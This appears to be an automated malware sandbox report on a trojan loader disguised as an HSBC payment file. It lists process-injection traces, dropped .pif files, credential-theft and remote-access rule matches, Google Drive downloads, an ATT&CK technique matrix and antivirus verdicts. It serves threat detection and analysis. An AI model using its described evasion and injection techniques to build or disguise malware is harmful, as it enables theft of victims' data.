Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2905019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2905019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2905019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2905019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD2050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290961C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290961C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2904E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2904E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2904E1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2904E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2904E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FCA020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FCC020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FEE016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FEE016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FEE016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FEE016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290A61E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290001F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29054000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29072000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29066030 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29056050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FCA197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FCA197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FCA197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD6154 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD6154 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FCC156 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290680A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290960B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290960B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290520DE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290560E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290120F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2900A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2900A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2900A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE02E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE02E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE02E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290A8324 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290A8324 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290A8324 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290A8324 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290A634F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29052349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29078350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2905035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2905035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2905035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2905035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2905035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2905035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2909A352 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE02A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE02A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2907437C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FC826B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD4260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD4260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD4260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD6259 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FCA250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2908C3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290563C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FC823B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290743D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290743D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2907E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2907E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2907E3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2907E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290063FF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FEE3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FEE3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FEE3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FD83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29058243 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_29058243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_290A625D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2908A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_2908A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FC8397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FC8397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FC8397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FF438F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FF438F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\uzonfntK.pif | Code function: 3_2_28FCE388 mov eax, dword ptr fs:[00000030h]

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Memory allocated: C:\Users\Public\Libraries\uzonfntK.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Memory allocated: C:\Users\Public\Libraries\uzonfntK.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Memory allocated: C:\Users\Public\Libraries\uzonfntK.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\uzonfntK.pif | Section loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and write
Source: C:\Users\Public\Libraries\uzonfntK.pif | Section loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and write
Source: C:\Users\Public\Libraries\uzonfntK.pif | Section loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and write
Source: C:\Users\Public\Libraries\uzonfntK.pif | Section loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and write
Source: C:\Users\Public\Libraries\uzonfntK.pif | Section loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and write
Source: C:\Users\Public\Libraries\uzonfntK.pif | Section loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and write
Source: C:\Users\Public\Libraries\uzonfntK.pif | Section loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and write
Source: C:\Users\Public\Libraries\uzonfntK.pif | Section loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and write
Source: C:\Users\Public\Libraries\uzonfntK.pif | Section loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and write
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Section unmapped: C:\Users\Public\Libraries\uzonfntK.pif base address: 400000
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section unmapped: C:\Users\Public\Libraries\uzonfntK.pif base address: 400000
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Section unmapped: C:\Users\Public\Libraries\uzonfntK.pif base address: 400000
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Memory written: C:\Users\Public\Libraries\uzonfntK.pif base: 364008
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Memory written: C:\Users\Public\Libraries\uzonfntK.pif base: 3B1008
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Memory written: C:\Users\Public\Libraries\uzonfntK.pif base: 378008
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Process created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pif
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Process created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pif
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Process created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pif
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02A85A78
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: GetLocaleInfoA, 0_2_02A8A790
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: GetLocaleInfoA, 0_2_02A8A744
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02A85B84
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 5_2_02995A78
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: GetLocaleInfoA, 5_2_0299A790
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 5_2_02995B83
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A8918C GetLocalTime
Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exe | Code function: 0_2_02A8B70C GetVersionExA
Source: C:\Users\Public\Libraries\Ktnfnozu.PIF | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: Yara match | File source: 3.2.uzonfntK.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.uzonfntK.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2280734227.0000000028280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2197880197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

Source: Yara match | File source: 3.2.uzonfntK.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.uzonfntK.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2280734227.0000000028280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2197880197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

One column per tactic, one technique per cell. A leading number is the sandbox's hit counter for that technique, kept exactly as extracted; cells without a number had no matching signature.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 Valid Accounts | 1 Valid Accounts | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Shared Modules | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Valid Accounts | LSASS Memory | 221 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 411 Process Injection | 1 Access Token Manipulation | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 2 Virtualization/Sandbox Evasion | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 113 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 DLL Side-Loading | 411 Process Injection | LSA Secrets | 1 System Network Connections Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Obfuscated Files or Information | DCSync | 35 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph ID: 1583879   Sample: HSBC_PAY.SCR.exe   Start date: 03/01/2025   Architecture: WINDOWS   Score: 100

                      Start (node 2)
                        DNS/IP: drive.usercontent.google.com (node 44); drive.google.com (node 46)
                        Signatures: Found malware configuration; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 10 other signatures
                        Started: HSBC_PAY.SCR.exe 1 10 (node 8); Ktnfnozu.PIF 6 (node 13); Ktnfnozu.PIF 6 (node 15)

                      HSBC_PAY.SCR.exe (node 8)
                        DNS/IP: drive.google.com 142.250.184.238, 443, 49730, 49731 GOOGLEUS United States (node 48); drive.usercontent.google.com 142.250.185.129, 443, 49732 GOOGLEUS United States (node 50)
                        Dropped: C:\Users\Public\Libraries\uzonfntK.pif, PE32 (node 36); C:\Users\Public\Libraries\Ktnfnozu.PIF, PE32 (node 38); C:\Users\Public\Libraries\Ktnfnozu, data (node 40); 2 other malicious files (node 42)
                        Signatures: Drops PE files with a suspicious file extension; Writes to foreign memory regions; Allocates memory in foreign processes; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        Started: uzonfntK.pif (node 17); cmd.exe 1 (node 20)

                      Ktnfnozu.PIF (node 13)
                        Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                        Started: uzonfntK.pif (node 22); cmd.exe (node 24)

                      Ktnfnozu.PIF (node 15)
                        Signatures: Sample uses process hollowing technique; Sample is not signed and drops a device driver
                        Started: uzonfntK.pif (node 26); cmd.exe 1 (node 28)

                      uzonfntK.pif (node 17)
                        Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process

                      cmd.exe (node 20) started conhost.exe (node 30); cmd.exe (node 24) started conhost.exe (node 32); cmd.exe (node 28) started conhost.exe (node 34)

                      | Source | Detection | Scanner | Label |
                      | HSBC_PAY.SCR.exe | 50% | ReversingLabs | Win32.Trojan.ModiLoader |
                      | HSBC_PAY.SCR.exe | 100% | Avira | HEUR/AGEN.1325882 |
